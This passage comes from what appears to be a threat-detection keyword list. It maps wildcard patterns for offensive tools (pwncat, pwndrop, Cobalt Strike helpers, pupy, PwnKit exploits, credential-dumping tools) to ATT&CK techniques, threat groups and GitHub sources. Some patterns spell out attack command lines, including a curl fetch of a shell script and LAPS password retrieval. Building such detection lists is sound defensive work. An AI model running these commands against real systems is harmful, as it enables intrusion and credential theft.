T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z -*pwn1sher/WMEye*,offensive_tool_keyword,WMEye,WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement,T1210 - T1570,TA0001 - TA0002 - TA0003 - TA0004 - TA0009,N/A,N/A,POST Exploitation tools,https://github.com/pwn1sher/WMEye,1,1,N/A,N/A,4,334,54,2021-12-24T05:38:50Z,2021-09-07T08:18:30Z -*pwnagotchi*,offensive_tool_keyword,pwnagotchi,Pwnagotchi is an A2C-based AI leveraging bettercap that learns from its surrounding WiFi environment to maximize the crackable WPA key material it captures (either passively. or by performing authentication and association attacks). This material is collected as PCAP files containing any form of handshake supported by hashcat. including PMKIDs. full and half WPA handshakes,T1562.004 - T1040 - T1557.001,TA0002 - TA0003 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/evilsocket/pwnagotchi,1,0,N/A,N/A,10,6215,976,2023-07-25T00:15:21Z,2019-09-19T13:07:15Z -*pwnat.exe*,offensive_tool_keyword,pwnat,pwnat. by Samy Kamkar. is a tool that allows any client behind a NAT to communicate with a server behind a separate NAT with *no* port forwarding and *no* DMZ setup on any routers in order to directly communicate with each other. Simply put. this is a proxy server that works behind a NAT. even when the client is also behind a NAT,T1584 - T1571 - T1210.001,TA0009 - TA0002,N/A,N/A,Defense Evasion,https://github.com/samyk/pwnat,1,0,N/A,N/A,10,2861,456,2023-08-08T05:09:00Z,2012-08-10T05:55:11Z -*pwncat-cs *:*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pwncat-cs -lp *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pwncat-cs ssh://*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pwndb --target @* --output *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pwndrop install*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,0,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z -*pwndrop start*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,0,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z -*pwndrop status*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,0,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z -*pwndrop stop*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,0,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z -*pwndrop-linux-amd64*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,1,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z -*pwndrop-master*,offensive_tool_keyword,pwndrop,Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.,T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005,TA0011 - TA0005 - TA0042,N/A,N/A,C2,https://github.com/kgretzky/pwndrop,1,1,N/A,10,10,1751,236,2023-02-25T05:08:15Z,2019-11-28T19:06:30Z -*pwned_x64/notepad.exe*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Pwned-creds_Domainpasswordspray.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*pwnedornot.py -d *,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pwned-passwords-ntlm*,offensive_tool_keyword,ShuckNT,ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES),T1552.001 - T1555.003 - T1078.003,TA0006 - TA0002 - TA0040,N/A,N/A,Credential Access,https://github.com/yanncam/ShuckNT,1,1,N/A,10,1,36,4,2023-02-02T10:40:59Z,2023-01-27T07:52:47Z -*pwnkit *,offensive_tool_keyword,POC,Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team,T1068,TA0004,N/A,N/A,Exploitation tools,https://github.com/Ayrx/CVE-2021-4034,1,0,N/A,N/A,1,97,16,2022-01-27T11:57:05Z,2022-01-26T03:33:47Z -*pwnkit64decoded.c*,offensive_tool_keyword,POC,exploitation of CVE-2021-4034,T1210,N/A,N/A,N/A,Exploitation tools,https://github.com/luijait/PwnKit-Exploit,1,1,N/A,N/A,1,79,14,2022-02-07T15:42:00Z,2022-01-26T18:01:26Z -*pwnsauc3/RWXFinder*,offensive_tool_keyword,rwxfinder,The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section,T1059.001 - T1059.003 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Discovery,https://github.com/pwnsauc3/RWXFinder,1,1,N/A,5,1,89,12,2023-07-15T15:42:55Z,2023-07-14T07:47:21Z -*pwsafe2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*pxethief *,offensive_tool_keyword,pxethief,PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager,T1555.004 - T1555.002,TA0006,N/A,N/A,Credential Access,https://github.com/MWR-CyberSec/PXEThief,1,0,N/A,N/A,3,220,27,2023-05-18T19:55:17Z,2022-08-12T22:16:46Z -*pxethief.py*,offensive_tool_keyword,pxethief,PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager,T1555.004 - T1555.002,TA0006,N/A,N/A,Credential Access,https://github.com/MWR-CyberSec/PXEThief,1,1,N/A,N/A,3,220,27,2023-05-18T19:55:17Z,2022-08-12T22:16:46Z -*py2exe *,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,0,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*py2exe*.exe *,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,0,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*py2exe*.msi *,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,0,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*py2exe*.py*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,0,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*py2exe-*.tar.gz*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,1,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*py2exe-*.whl*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,1,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*py2exe.build_exe*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,1,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*py2exe.freeze*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,1,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*py2exe.git*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,1,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*py2exe_setuptools.py*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,1,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*py2exe-master.zip*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,1,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -*pycobalt.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*pycobalt/aggressor*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*pycobalt_debug_on*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*pycobalt_path*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*pycobalt_python*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*pycobalt_timeout*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*pydictor*,offensive_tool_keyword,pydictor,pydictor A powerful and useful hacker dictionary builder for a brute-force attack,T1110 - T1111 - T1210 - T1558.004,TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/LandGrey/pydictor,1,0,N/A,N/A,10,2936,618,2023-01-11T13:02:06Z,2016-08-17T08:16:56Z -*pyexec -c *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*pyexec --file*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*PyExec-main.*,offensive_tool_keyword,PyExec,This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.,T1134 - T1055 - T1548.002,TA0004 - TA0005 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/OlivierLaflamme/PyExec,1,1,N/A,9,1,10,6,2019-09-11T13:56:04Z,2019-09-11T13:54:15Z -*pygpoabuse * -hashes lm:* -gpo-id *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pygpoabuse.py*,offensive_tool_keyword,pyGPOAbuse,python implementation of SharpGPOAbuse,T1566.001 - T1059.006 - T1112,TA0001 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/Hackndo/pyGPOAbuse,1,1,N/A,8,2,178,26,2023-01-20T19:02:09Z,2020-05-10T21:21:27Z -*pyherion.py*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*pyhon3 poc.py * curl http://*/shell.sh -o /tmp/shell.sh*,offensive_tool_keyword,POC,Automated PoC exploitation of CVE-2021-44521,T1548 - T1190,TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/QHpix/CVE-2021-44521,1,0,N/A,N/A,1,9,2,2022-02-24T12:04:40Z,2022-02-24T11:07:34Z -*pyinstaller *.py*,greyware_tool_keyword,pyinstaller,PyInstaller bundles a Python application and all its dependencies into a single package executable.,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,N/A,N/A,Execution,https://www.pyinstaller.org/,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*pyinstaller.exe*,greyware_tool_keyword,pyinstaller,PyInstaller bundles a Python application and all its dependencies into a single package executable.,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,N/A,N/A,Execution,https://www.pyinstaller.org/,1,1,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*pyinstaller/tarball*,greyware_tool_keyword,pyinstaller,PyInstaller bundles a Python application and all its dependencies into a single package executable.,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,N/A,N/A,Execution,https://www.pyinstaller.org/,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*pyinstaller-script.py*,greyware_tool_keyword,pyinstaller,PyInstaller bundles a Python application and all its dependencies into a single package executable.,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,N/A,N/A,Execution,https://www.pyinstaller.org/,1,1,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*pyLAPS.py --action get -d * -u * -p * --dc-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*pyLAPS-main*,offensive_tool_keyword,pyLAPS,A simple way to read and write LAPS passwords from linux.,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/p0dalirius/pyLAPS,1,1,N/A,9,1,50,9,2023-10-01T19:17:01Z,2021-10-05T18:35:21Z -*pyMalleableC2*,offensive_tool_keyword,cobaltstrike,Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CodeXTF2/Burp2Malleable,1,1,N/A,10,10,320,32,2023-04-06T15:24:12Z,2022-08-14T18:05:39Z -*pymultitor*,offensive_tool_keyword,pymultitor,Python Multi Threaded Tor Proxy. Did you ever want to be at two different places at the same time? When I asked myself this question. I actually started developing this solution in my mind. While performing penetration tests there are often problems caused by security devices that block the attacking IP,T1071.001 - T1071.004 - T1055.008,TA0002 - TA0003 - TA0008,N/A,N/A,Data 